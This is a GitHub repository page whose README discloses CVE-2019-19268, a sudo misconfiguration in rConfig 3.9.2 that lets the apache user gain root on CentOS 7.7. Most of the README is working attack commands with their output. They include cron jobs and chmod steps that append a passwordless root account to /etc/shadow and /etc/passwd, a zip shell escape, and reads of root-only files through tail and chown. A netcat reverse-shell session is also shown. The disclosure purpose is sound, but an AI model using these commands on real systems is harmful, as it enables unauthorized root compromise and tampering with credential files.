Skip to content
New Found 0-days!
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
PocChmod.png Add files via upload Nov 26, 2019
PocChmod1.png Add files via upload Nov 26, 2019
PocChown.png Add files via upload Nov 26, 2019
PocChown1.png Add files via upload Nov 26, 2019
PocCrontab.png Add files via upload Nov 26, 2019
PocTail.png Add files via upload Nov 26, 2019
PocTail1.png Add files via upload Nov 26, 2019
PocZip.png Add files via upload Nov 26, 2019
README.md Update README.md Dec 4, 2019

README.md

CVE-2019-19268

Affected Version: rConfig 3.9.2.

[Description]
Multiple attack vectors in rConfig v3.9.2 due to misconfiguration, which allows local users to execute root commands via sudo.

[Discoverers]
dmw0ng - Discord: dmw0ng#4449
TheCyberGeek - Discord: TheCyberGeek#1892
Email: cybergeek19@protonmail.com

The Sudo configuration in rConfig 3.9.2 gives the apache user access to execute the /usr/bin/zip, /bin/chmod, and /usr/bin/tail programs as root. This can be used for remote code execution in conjunction with CVE-2019-16662 and CVE-2019-16663.

This is a set of vulnerabilities leading to system compromise due to user improper configuration.

[Vulnerability Type]
Insecure Permissions

OS: CentOS 7.7.1908 Software: rConfig v3.9.2

Multiple attack vectors in rConfig v3.9.2 due to misconfiguration, which allows local users to execute root commands via sudo.

Using Askar's exploit:
https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ we gain apache user on rConfig 3.9.2.

Access

root@TheCyberGeek:~# nc -lvvp 4444
listening on [any] 4444 ...
192.168.230.22: inverse host lookup failed: Unknown host
connect to [10.10.11.3] from (UNKNOWN) [192.168.230.22] 60598
whoami
apache
id
uid=48(apache) gid=48(apache) groups=48(apache)

Rooting Multiple Attack Vectors:

User apache may run the following commands on Misconfigured:
(ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm

sudo /usr/bin/crontab:

id
uid=48 gid=48(apache) groups=48(apache)
sudo /usr/bin/crontab -l | { cat; echo "* * * * * echo 'pwned:::0:99999:7:::' >> /etc/shadow"; } | sudo /usr/bin/crontab -
sudo /usr/bin/crontab -l | { cat; echo "* * * * * echo 'pwned:x:0:0:root:/root:/bin/bash' >> /etc/passwd"; } | sudo /usr/bin/crontab -
sudo /usr/bin/crontab -l
* * * * * echo 'pwned:::0:99999:7:::' >> /etc/shadow
* * * * * echo 'pwned:x:0:0:root:/root:/bin/bash' >> /etc/passwd
su pwned
id
uid=0(root) gid=0(root) groups=0(root)

sudo /usr/bin/zip:

id
uid=48 gid=48(apache) groups=48(apache)
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 65%)
sudo rm $TF
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

sudo /bin/chmod

sudo /bin/chmod 777 /etc/shadow
sudo /bin/chmod 777 /etc/passwd
echo "pwned:::0:99999:7:::" >> /etc/shadow
echo "pwned:x:0:0:root:/root:/bin/bash" >> /etc/passwd
su pwned
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

sudo /usr/bin/tail File Read

id
uid=48(apache) gid=48(apache) groups=48(apache)
ls -la /root/secret.txt
-rwx------ 1 root root 19 Nov 25 11:41 /root/secret.txt
cat /root/secret.txt

LFILE=/root/secret.txt
sudo tail -c1G "$LFILE"
I got the secret

sudo /bin/chown Change File Permissions

ls -la /root/secret.txt
-rwx------ 1 root root 19 Nov 25 11:41 /root/secret.txt
sudo /bin/chown apache:apache /root/secret.txt
ls -la /root/secret.txt
-rwx------ 1 apache apache 19 Nov 25 11:41 /root/secret.txt
cat /root/secret.txt
I got the secret

In turn we fully compromise any CentOS 7.7.1908 with rConfig installed.

You can’t perform that action at this time.